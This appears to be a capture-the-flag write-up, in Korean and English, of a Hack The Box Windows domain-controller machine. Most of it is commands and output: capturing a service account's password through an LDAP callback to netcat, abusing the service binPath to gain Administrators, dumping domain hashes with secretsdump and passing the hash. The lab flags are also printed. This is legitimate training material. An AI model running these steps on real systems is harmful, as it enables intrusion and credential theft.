Proof of Concept
10.129.4.65
Nmap
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsmanInformation Gathering
hosts 정보 수집
┌──(kali㉿kali)-[~/Return]
└─$ nxc smb 10.129.4.65 --generate-hosts-file hosts
SMB 10.129.4.65 445 PRINTER [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
┌──(kali㉿kali)-[~/Return]
└─$ cat hosts
10.129.4.65 PRINTER.return.local return.local PRINTER/etc/hosts 파일 설정
┌──(kali㉿kali)-[~/Return]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.4.65 PRINTER.return.local return.local PRINTERInitial Access
80 포트 웹서비스 접근 시 “HTB Printer Admin Panel” 서비스가 동작중인 것을 확인
페이지 탐색 결과, http://return.local/settings.php 발견
┌──(kali㉿kali)-[~/Return]
└─$ feroxbuster -u http://return.local -t 100 -s 200 -w /usr/share/dirb/wordlists/common.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.13.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://return.local/
🚩 In-Scope Url │ return.local
🚀 Threads │ 100
📖 Wordlist │ /usr/share/dirb/wordlists/common.txt
👌 Status Codes │ [200]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.13.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200 GET 39l 196w 17216c http://return.local/images/1.png
200 GET 1345l 2796w 28274c http://return.local/index.php
200 GET 1376l 2855w 29090c http://return.local/settings.php
200 GET 1345l 2796w 28274c http://return.local/
[####################] - 29s 13898/13898 0s found:4 errors:6
[####################] - 21s 4614/4614 218/s http://return.local/
[####################] - 17s 4614/4614 266/s http://return.local/images/
[####################] - 17s 4614/4614 268/s http://return.local/Images/ http://return.local/settings.php 접근 시 서비스 설정 페이지 확인 가능
로컬에 389 포트 오픈 후, 설정 페이지에서 Server Address를 로컬 IP 주소로 변경해서 Update 하면 svc-printer 계정 정보 확인 가능
- svc-printer:1edFg43012!!
┌──(kali㉿kali)-[~/Return]
└─$ nc -nlvp 389
listening on [any] 389 ...
connect to [10.10.14.111] from (UNKNOWN) [10.129.4.65] 57995
0*`%return\svc-printer�
1edFg43012!!알아낸 svc-printer 계정으로 WinRM 접속 성공
┌──(kali㉿kali)-[~/Return]
└─$ nxc winrm return.local -u 'svc-printer' -p '1edFg43012!!'
WINRM 10.129.4.65 5985 PRINTER [*] Windows 10 / Server 2019 Build 17763 (name:PRINTER) (domain:return.local)
WINRM 10.129.4.65 5985 PRINTER [+] return.local\svc-printer:1edFg43012!! (Pwn3d!)
┌──(kali㉿kali)-[~/Return]
└─$ evil-winrm -i return.local -u 'svc-printer' -p '1edFg43012!!'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-printer\Documents>Read user.txt
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> type user.txt
ca30f64bcdbe392216d84a351ae1ae90
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::a6
IPv6 Address. . . . . . . . . . . : dead:beef::d1b0:4eb:4176:1903
Link-local IPv6 Address . . . . . : fe80::d1b0:4eb:4176:1903%10
IPv4 Address. . . . . . . . . . . : 10.129.4.65
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%10
10.129.0.1Privilege Escalation
svc-printer 사용자가 “Server Operators” 그룹에 속한 것을 확인
*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
================== =============================================
return\svc-printer S-1-5-21-3750359090-2939318659-876128439-1103
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators Alias S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators Alias S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
<SNIP>“Server Operators” 그룹 권한을 악용하여 Administrators 그룹에 svc-printer 사용자 추가
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe config VMTools binPath="cmd.exe /c 'net localgroup Administrators svc-printer /add'"
[SC] ChangeServiceConfig SUCCESS
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe stop VMTools
SERVICE_NAME: VMTools
TYPE : 10 WIN32_OWN_PROCESS
STATE : 1 STOPPED
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe start VMTools
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
*Evil-WinRM* PS C:\Users\svc-printer\Documents> net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
svc-printer
The command completed successfully.impacket-secretsdump를 사용하여 Administrator NTLM 해시 덤프
- 32db622ed9c00dd1039d8288b0407460
┌──(kali㉿kali)-[~/Return]
└─$ impacket-secretsdump svc-printer:'1edFg43012!!'@return.local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xa42289f69adb35cd67d02cc84e69c314
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:34386a771aaca697f447754e4863d38a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
RETURN\PRINTER$:aes256-cts-hmac-sha1-96:f41640df99fb51e8bf760586ce087bf5684e1e32ac184dd185e12bd899810124
RETURN\PRINTER$:aes128-cts-hmac-sha1-96:171b5d6e99b9cc380638b4321a6f6d65
RETURN\PRINTER$:des-cbc-md5:ba9e9d3df7fbbcfb
RETURN\PRINTER$:plain_password_hex:986fcd73d3b55ed0d436e5086af34dbe7467fe423d355f699b9c58b4e4eb829882e4608fcd2397b9ef2f50d1cd0d29ce638f5757ab7391a728b3c33a160bcad0011a705182df55f56a8361a698700a8d14ff1583c5d1f4147c1658fc3df31bb49146bc12570ac851502308844dbe1743ee4253b3f051635c6e0644dc3da5a055bc43d2752d3e93a519ed89dcf3d92436a39fb946e445a04f27f242df67e4f0f379f3d5a251d76ac43f62ad248fcaf8248cf31df3eda0686af08d248612770677a25e37f6f5c601ee1185939f293d1aeb46050d06e78594411b2518a40cb64c9bb63fc15adc4c36f50a36f802c35f6e47
RETURN\PRINTER$:aad3b435b51404eeaad3b435b51404ee:e7cd8901d8d8bd83330bd02576c2a7b9:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x06243ead9780ed8b9e36d34624aca3eff9eff2a0
dpapi_userkey:0x3dba4981ae9cb884001d7b0b3ffa5d3504fc12b8
[*] NL$KM
0000 16 BD CA 34 21 A5 5C AD 51 ED B1 7E 4A 4F 59 B8 ...4!.\.Q..~JOY.
0010 C3 65 1E 1A 5D 6D 97 82 79 3A 58 A0 FC 2B B5 8B .e..]m..y:X..+..
0020 A4 E2 9B CF DD 7B 52 80 99 33 45 4F F1 35 15 DC .....{R..3EO.5..
0030 4F 99 B3 A1 CB 55 21 A5 CC F5 27 43 F7 16 AA BC O....U!...'C....
NL$KM:16bdca3421a55cad51edb17e4a4f59b8c3651e1a5d6d9782793a58a0fc2bb58ba4e29bcfdd7b52809933454ff13515dc4f99b3a1cb5521a5ccf52743f716aabc
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:32db622ed9c00dd1039d8288b0407460:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4e48ce125611add31a32cd79e529964b:::
return.local\svc-printer:1103:aad3b435b51404eeaad3b435b51404ee:c1d26bdcecf44246b5f8653284331a2e:::
PRINTER$:1000:aad3b435b51404eeaad3b435b51404ee:e7cd8901d8d8bd83330bd02576c2a7b9:::획득한 NTLM 해시를 이용하여 WinRM 접속
┌──(kali㉿kali)-[~/Return]
└─$ evil-winrm -i return.local -u 'administrator' -H '32db622ed9c00dd1039d8288b0407460'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>Read root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
2881fa82ca626ead2b6768ab671532e5
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::a6
IPv6 Address. . . . . . . . . . . : dead:beef::d1b0:4eb:4176:1903
Link-local IPv6 Address . . . . . : fe80::d1b0:4eb:4176:1903%10
IPv4 Address. . . . . . . . . . . : 10.129.4.65
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%10
10.129.0.1